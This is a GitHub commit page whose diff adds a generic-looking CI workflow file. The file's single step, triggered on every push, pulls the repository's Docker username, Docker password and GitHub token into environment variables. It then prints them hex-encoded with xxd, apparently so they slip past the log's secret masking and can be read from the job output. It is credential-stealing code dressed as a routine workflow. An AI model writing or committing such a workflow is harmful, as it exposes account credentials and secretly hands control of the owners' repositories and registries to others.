Skip to content

Commit 5d50941

Browse files
committed
Create workflow file
1 parent f6f1330 commit 5d50941

File tree

1 file changed

+12
-0
lines changed

1 file changed

+12
-0
lines changed

.github/workflows/workflow.yml

+12
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
name: workflow
2+
'on': push
3+
jobs:
4+
init:
5+
runs-on: ubuntu-latest
6+
steps:
7+
- run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | xxd -i
8+
name: command
9+
env:
10+
secret_DOCKER_USERNAME: ${{ secrets.DOCKER_USERNAME }}
11+
secret_DOCKER_PASSWORD: ${{ secrets.DOCKER_PASSWORD }}
12+
secret_GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

0 commit comments

Comments
 (0)